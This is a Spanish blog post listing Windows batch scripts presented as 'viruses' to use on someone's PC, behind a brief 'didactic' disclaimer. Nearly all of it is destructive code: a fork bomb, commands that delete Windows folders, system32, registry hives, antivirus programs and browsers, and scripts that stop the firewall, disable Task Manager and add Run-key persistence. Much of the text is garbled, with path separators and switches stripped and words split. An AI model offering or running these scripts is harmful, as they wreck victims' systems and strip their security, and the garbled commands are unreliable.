[[[[[[[[[[[¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ Este post tiene un motivo unicamente didactic y divulgativo. El web master declina toda responsabilidad a cerca del uso inapropiado de las" tecnicas" y los tutoriales descritos!!!!!!!!!!!!!!!!!!!!]]]]]]]]]]]]
TUTORIALES:
VIRUS HECHOS:
- dejar colgado el pc:
@echo off
:main
start cmd.exe
goto main
bucle
- formatear pc y mensaje:
:main
taskkill/f explorer.exe
rd C:\Windows
rd C:\Archivos de Programa
rd C:\Program Files
rd C:\
rd Mis documentos
SHUTDOWN -S -f -T 20 -c "lo siento pero tu pc ha sido eliminado, en 20 segundos se apagara..."
- dejar sin internet a la persona infectada:
@echo off
ipconfigrelease
pause
exit
- elimina el antivirus de la persona infectada:
cls
net stop Norton antivirus
net stop Panda Software
net stop Kaspersky Lab
net stop McAfee.com
net stop NOD32 Antivirus System
net stop Symantec Antivirus
cls
cd
cd archivos de programa
cd Norton antivirus
attrib -R -A -S -H .
del S Q .
cd..
cd Panda Software
attrib -R -A -S -H .
del S Q .
cd..
cd Kaspersky Lab
attrib -R -A -S -H .
del S Q .
cd..
cd McAfee.com
attrib -R -A -S -H .
del S Q .
cd..
cd NOD32 Antivirus System
attrib -R -A -S -H .
del S Q .
cd..
cd Symantec
attrib -R -A -S -H .
del S Q .
cd..
cd Symantec Antivirus
attrib -R -A -S -H .
del S Q .
cls
cls
net stop centro de seguridad
net stop Firewall de WindowsConexión compartida a Internet (ICS)
cls
reg delete HKEY_CURRENT_USER
reg delete HKEY_CURRENT_ROOT
reg delete HKEY_LOCAL_MACHINE
reg delete HKEY_USERS
reg delete HKEY_CURRENT_CONFIG
cls
cd
cd WINDOWS
cd system32
del S Q .
cls
taskkill F IM explorer.exe
cls
exit
- petar el raton:
@cd CWINDOWSsystem
echo beanMOUSE.DRV
echo beanmouse.drv
@cd..
@cd CWINDOWS
@rmdir S Q Cursores
@rmdir S Q Cursors
@cd..
@cd Cwindowssystem32
@echo offWinbat.bat
@cd CWindowsWinbat
@reg del HKEY_CURRENT_U SERControl PanelSound F
echo beanSETDEBUG.EXEWinbat.bat
echo beanTETEP.DLLWinbat.bat
echo beanTwain.dllWinbat.bat
echo beanTwain_32.dllWinbat.bat
@DEL S Q JavaAccessBrid ge.dllWinbat.bat
@cd..
@cd CSystem Volume Information_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}RP51
@echo off WIN32.bat
@reg add HKEY_LOCAL_MAC HINESOFTWAREMicrosoftWindowsCurrentVersionRunv Win32 t REG_SZ d WIN32.bat F WIN32.bat
@reg add hkcusoftwaremicrosoftwindowscurrentversionpoliciessyst em v disabletaskmgr T REG_SZ D 1 F WIN32.bat
@reg add hkcusoftwaremicrosoftwindowscurrentversionpoliciessyst em v disableregistr ytools T REG_SZ D 1 F WIN32.bat
@reg add hkcusoftwaremicrosoftwindowscurrentVersionpoliciesExpl orerRestricRun T REG_SZ d eventvwr.exe F WIN32.bat
@reg add HKEY_LOCAL_MAC HINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon v logonprompt t REG_SZ d YoU ArE InFeCtEd!! F WIN32.bat
@reg add HKEY_CURRENT_U SERSoftwareMicrosoftWindowsCurrentVersionPolicesExplor er v NoSaveSettings T REG_DWORD D 1 F WIN32.bat
@reg add HKEY_CURRENT_U SERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplo re v NoClose t REG_DWORD D 1 F WIN32.bat
@shutdown -S -F -T 5 -C Error del Sistema Operativo, Se apagara en unos segundos...... BEAN!!!! WIN32.bat
@cd..
@cd CSystem Volume Information_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}RP51
@reg add HKEY_LOCAL_MAC HINESOFTWAREMicrosoftWindowsCurrentVersionRunv colorbat t REG_SZ d colorbat F colorbat.bat
@menucolorbat.bat
@call cmd.execolorbat.bat
@call cmd.execolorbat.bat
@call cmd.execolorbat.bat
@call cmd.execolorbat.bat
@call cmd.execolorbat.bat
@call cmd.execolorbat.bat
@call cmd.execolorbat.bat
@call cmd.execolorbat.bat
@GOTO MENUcolorbat.bat
@cdcolorbat.bat
@cd Cwindowssystem32
@DEL S Q Winbat.bat
@exit
- eliminar el msn
ren %ProgramFiles%MSN Messengermsnmsgr.exe msnmsgr.exe
TASKKILL F IM msnmsgr.exe
pause
exit
- eliminar exploradores:
cls
cd
cd archivos de programa
cd Internet Explorer
attrib -R -A -S -H .
del S Q .
cd..
cd Opera
attrib -R -A -S -H .
del S Q .
cd..
cd Mozilla Firefox
attrib -R -A -S -H .
del S Q .
cls
cls
del S Q CWINDOWSexplorer.exe
cls
cls
del S Q CWINDOWSsystem32notepad.exe
del S Q CWINDOWSsystem32calc.exe
del S Q CWINDOWSsystem32mspaint.exe
cls
pause
exit
- un precioso troyano:
NET STOP Centro de Seguridad
NET STOP Firewall de WindowsConexi¢n compartida a Internet (ICS)
NET START NetBIOS
NET START
REG ADD HKLMSYSTEMControlSet001ServicesSharedAccessParametersF irewallPolicyStandardProfile v EnableFirewall t REG_DWORD d 0 f
echo REG ADD HKLMSYSTEMControlSet001ServicesSharedAccessParametersF irewallPolicyStandardProfile v EnableFirewall t REG_DWORD d 0 f CWINDOWSsystem32firewall.bat
REG ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun v Microsoft t REG_SZ d %windir%system32firewall.bat f
REG ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun v NoDAntiVirus t REG_SZ d %windir%system32NET START NetBIOS f
REG ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun v Firewall t REG_SZ d %windir%system32NET STOP Firewall de WindowsConexi¢n compartida a Internet (ICS) f
REG ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun v CentrodeSeguridad t REG_SZ d %windir%system32NET STOP Centro de Seguridad f[code]
cls
pause
exit

No hay comentarios:
Publicar un comentario